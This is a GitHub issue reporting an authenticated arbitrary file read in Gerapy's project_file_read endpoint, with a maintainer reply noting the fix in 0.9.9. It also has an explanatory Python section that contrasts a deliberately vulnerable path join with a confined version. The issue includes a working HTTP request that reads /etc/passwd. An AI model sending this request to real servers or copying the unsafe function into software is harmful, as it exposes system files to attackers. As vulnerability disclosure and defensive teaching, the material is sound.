Gerapy/Gerapy

Arbitrary file reading vulnerability after authentication - Vuln

PeiQi0 opened this issue · 2 comments

Hello, I am a security researcher. I found an arbitrary file reading vulnerability in your team's project. After obtaining backend access, an attacker can send a specific request packet to obtain sensitive files and other information on the server. Such a flaw threatens users' security.

Location of vulnerable code: gerapy/server/core/views.py, the project_file_read method

The parameters path and label are user-controllable variables; the request packet below is constructed after login.

POST /api/project/file/read HTTP/1.1
Host:
Content-Length: 35
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"path":"/etc/","label":"passwd"}

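To make the reported pattern concrete, here is an added example (not code from the Gerapy project, the reporter, or the advisory): `read_file_unsafe` is a constructed stand-in for a view that joins two request-controlled strings and opens the result, and `read_file_confined` is one way to close the hole by anchoring both values to a server-side projects root. The function names, the `projects_root` parameter and the temporary directory layout are assumptions for the demo; the fix actually shipped in 0.9.9 may look different.

```python
import os
import tempfile

# Added example, not Gerapy's own code. read_file_unsafe reproduces the
# pattern the report describes (two request-controlled strings joined and
# opened); read_file_confined is one possible hardened form.


def read_file_unsafe(path, label):
    """Vulnerable pattern: os.path.join keeps `path` verbatim when it is
    absolute, returns `label` alone when `label` is absolute, and honours
    '..' segments, so a caller can name any file the server process can read."""
    with open(os.path.join(path, label), "rb") as f:
        return f.read()


def read_file_confined(projects_root, path, label):
    """Hardened form: `path` and `label` are taken relative to a server-side
    projects root (assumed to be known to the view) and the resolved target
    must stay under it. Absolute inputs are refused outright; realpath()
    collapses '..' and follows symlinks, so a symlink planted inside the tree
    cannot point outside it either."""
    if os.path.isabs(path) or os.path.isabs(label):
        raise PermissionError("absolute paths are not accepted")
    root = os.path.realpath(projects_root)
    target = os.path.realpath(os.path.join(root, path, label))
    try:
        inside = os.path.commonpath([root, target]) == root
    except ValueError:  # different drives on Windows: cannot be inside
        inside = False
    if not inside:
        raise PermissionError(f"refused: {target} is outside {root}")
    with open(target, "rb") as f:
        return f.read()


def _attempt(fn, *args):
    """Return the file content, or the exception class name if the read
    was refused (PermissionError and FileNotFoundError are both OSError)."""
    try:
        return fn(*args)
    except OSError as exc:
        return type(exc).__name__


def demo():
    """Build a constructed projects tree plus a file outside it, then run the
    report's two attack shapes against both implementations. Returns a dict
    of outcomes keyed by scenario so the result can be checked, not just printed."""
    root = tempfile.mkdtemp(prefix="projects-")
    project = os.path.join(root, "demo_project")
    os.makedirs(project)
    with open(os.path.join(project, "settings.py"), "wb") as f:
        f.write(b"BOT_NAME = 'demo'\n")  # constructed sample project file

    outside = tempfile.mkdtemp(prefix="outside-")  # stands in for /etc
    with open(os.path.join(outside, "passwd"), "wb") as f:
        f.write(b"root:x:0:0:root:/root:/bin/sh\n")  # constructed, not the host's file

    # Same shapes as the report's PoC ({"path": "/etc/", "label": "passwd"})
    # and, for a server that prepends its own root, a '..' traversal.
    traversal = os.path.relpath(outside, project)  # e.g. "../../outside-xxxx"
    escaped = os.path.join(traversal, "passwd")

    return {
        "unsafe_legit": _attempt(read_file_unsafe, project, "settings.py"),
        "unsafe_absolute": _attempt(read_file_unsafe, outside, "passwd"),
        "unsafe_traversal": _attempt(read_file_unsafe, project, escaped),
        "confined_legit": _attempt(read_file_confined, root, "demo_project", "settings.py"),
        "confined_absolute": _attempt(read_file_confined, root, outside, "passwd"),
        "confined_traversal": _attempt(read_file_confined, root, "demo_project", escaped),
    }


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario:20} -> {outcome!r}")
```

The unsafe variant reads the legitimate file and both escape attempts alike; the confined variant still serves the project file but raises PermissionError for the absolute path and for the traversal. Checking containment on the realpath'd result (rather than on the raw string) is what makes the symlink and `..` cases fall out of the same comparison.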

Someone already submitted #210 before you.

Fixed in 0.9.9 and published an advisory: GHSA-756h-r2c9-qp5j